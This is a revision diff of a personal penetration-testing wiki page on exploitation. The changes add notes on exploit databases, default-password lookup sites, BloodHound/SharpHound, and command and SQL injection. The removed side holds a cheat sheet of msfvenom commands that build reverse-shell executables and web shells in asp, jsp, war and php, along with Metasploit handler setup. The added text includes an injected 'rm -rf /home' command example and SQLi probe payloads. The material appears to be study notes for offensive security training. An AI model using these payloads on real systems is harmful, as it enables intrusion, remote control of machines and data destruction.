The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » method_4_exploitation
method_4_exploitation

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
method_4_exploitation [2022/12/29 23:30] – [Medusa] gmanmethod_4_exploitation [2023/01/12 00:27] (current) – [Defaults] gman
Line 34: Line 34:
       * Daemons & Services       * Daemons & Services
     - GOAL: Establish a persistent way in.     - GOAL: Establish a persistent way in.
 +
 +===== Resources =====
 +
 +Exploit resources can be found in several places.
 +  * Example: GitHub, personal web sites.
 +  * Quality varies and you'll need to assess that quality.
 +
 +Central sites that specialize in exploits:
 +  - [[https://www.exploit-db.com/ | The Exploit Database]]
 +  - [[https://www.rapid7.com/db/ | The Rapid7 Vulnerability & Exploit Database]]
 +  - [[https://nvd.nist.gov/ | The NVD]] (National Vulnerability Database)
 +  - [[https://vuldb.com/ | VulDB]]
  
 ---- ----
  
 +====== Defaults ======
 +
 +Many folks leave many devices with factory defaults. You can quickly look up the default login creds here: 
 +  * https://www.defaultpassword.com/
 +  * https://default-password.info/
 +  * https://cirt.net/passwords
 +  * [[https://www.google.com/search?q=default+passwords | Or just Google "default passwords"]]. There are a ton of sites.
 +
 +---- 
 ====== Tools ====== ====== Tools ======
 +
 +===== Bloodhound =====
 +
 +[[https://www.kali.org/tools/bloodhound/ | Bloodhound]] is a tool to //**visualize**// Active Directory (AD) objects and permissions.
 +
 +**NOTE:** Bloodhound cannot be used by itself. You need to feed this puppy...
 +  * You have to aquire the AD info first using a tool like [[https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux | Sharphound]].
 +    * You must be a domain member to run it.
 +    * It will enumerate the AD domain.
 +  * Then, you feed the Sharphound info into Bloodhound
 +    - Analyze the results to build a target list.
 +    - Build a list of Domain Admins.
 +
 ===== curl ===== ===== curl =====
  
Line 101: Line 135:
  
 ---- ----
-====== MetaSploit ======+===== MetaSploit =====
  
-===== msfvenom =====+See [[cheat_sheets_metasploit| here]]. 
 + 
 +==== msfvenom ====
  
 See [[cheat_sheets_various#msfvenom | here]]. See [[cheat_sheets_various#msfvenom | here]].
- 
----- 
- 
-===== MSF Handler ===== 
- 
-''msfconsole''...Handlers should be in the following format: 
- 
-<code> 
-use exploit/multi/handler 
-set PAYLOAD <Payload name> 
-set LHOST <LHOST value> 
-set LPORT <LPORT value> 
-</code> 
- 
----- 
- 
-===== Non-Meterpreter Binaries ===== 
- 
-**Staged Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Stageless Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Staged Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-**Stageless Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-===== Non-Meterpreter Web Payloads ===== 
- 
-<code> 
-# asp  
-msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp 
- 
-# jsp 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp 
- 
-# war 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war 
- 
-# php 
-msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php 
-</code> 
- 
-===== Meterpreter Binaries ===== 
- 
-**Staged Payloads for Windows** 
- 
-<code> 
- 
-# x86 
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Stageless Payloads for Windows** 
- 
-<code> 
-# x86 
-msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe 
- 
-# x64 
-msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe 
-</code> 
- 
-**Staged Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-**Stageless Payloads for Linux** 
- 
-<code> 
-# x86 
-msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf 
- 
-# x64 
-msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf 
-</code> 
- 
-===== Meterpreter Web Payloads ===== 
- 
-<code> 
-# asp 
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp 
- 
-# jsp 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > example.jsp 
- 
-# war 
-msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > example.war 
- 
-# php 
-msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php 
-</code> 
  
 ---- ----
Line 291: Line 195:
 ==== Patator ==== ==== Patator ====
  
-**Patator** is another brute-force login tool like Hydra and Medusa ([[https://www.kali.org/tools/patator/ | more info]].+Patator is another brute-force login tool like Hydra and Medusa ([[https://www.kali.org/tools/patator/ | more info]].
   * It works with a variety of protocols.   * It works with a variety of protocols.
   * It's a bit more difficult to use. The author says it's "less script kiddie friendly."   * It's a bit more difficult to use. The author says it's "less script kiddie friendly."
 +
 +----
 +
 +====== Injection Attacks ======
 +
 +===== Command =====
 +
 +**Command Injection Attacks:** These are attacks that attempt to send commands through a web app to the operating system.
 +  * It would give you the ability to directly manipulate the o/s.
 +  * On Linux, use the ''system()'' call to send commands to the o/s itself.
 +
 +**Example:** If an app asks for a username to set up an account (assuming the username dbag)
 +  * When we create our account with the username "dbag," the back-end result sent to the o/s would be something like: 
 +    * ''system('mkdir /home/dbag')''
 +  * Using command injection, you add commands to our user input:
 +    * ''dbag & rm -rf /home''
 +  * This would result in a command like this: 
 +    * ''system('mkdir /home/dbag & rm -rf /home')''
 +  * And that's bad.
 +
 +===== SQLi =====
 +
 +
 +**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box.
 +
 +<code>
 +' or '1'='1
 +</code>
 +
 +==== Tool: SQLMap ====
 +
 +Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target.
 +
 +==== Blind SQLi ====
 +
 +Blind SQL injection takes two forms: boolean-based (T/F) and timing-based.
 +
 +**Boolean-Based Blind SQLi:** Uses a boolean (T/F) SQL injection statement to test if the injected code gets through. 
 +  - Test for a standard SQL injection vulnerability by placing a boolean TRUE after valid input.
 +    * If it is vulnerable it will match ALL results.
 +    * If it is not vulnerable, you will get a normal result (as if you did not send the ''1=1'')
 +  - Further test the vulnerability by sending it a boolean FALSE.
 +    * Since 1 never equals 2, this should never return results.
 +    * If it returns results on your valid input, there is no vulnerability
 +    * If it returns no results, then the injection worked.
 +
 +<code>
 +# 1. TRUE test example. Your input into target web app:
 +[valid input]' OR 1=1;--
 +
 +# 2. FALSE test example. Your input into target web app:
 +[valid input]' AND 1=2;--
 +</code>
 +
 +**Timing-Based Blind SQLi:** relies on the amount of time required to process a query.
 +  * If the app returns on the query immediately, it's probably not vulnerable.
 +  * If there is a delay/pause (based on your query statement) before the return, the injection worked.
 +  * Example:
 +
 +<code>[valid input]'; WAITFOR DELAY '00:00:15';--</code>
 +
 +**Tools:** Metasploit & SQLMap.
 +  * They automate these timing-based attacks, making them fairly easy. 
  
 ---- ----
Line 321: Line 288:
  
 https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/  (scroll down) https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/  (scroll down)
- 
----- 
- 
-====== SQLi ====== 
- 
-**SQL Injection:** One quick way to check to see if the server is vulnerable to SQL injections, type the following into the query box. 
- 
-<code> 
-' or '1'='1 
-</code> 
- 
-===== Tool: SQLMap ===== 
- 
-Automates SQLi enumeration and exploitation. Use it only after you have manually verified there is indeed an SQLi vulnerability on the target. 
  
 ---- ----
method_4_exploitation.1672356656.txt.gz · Last modified: by gman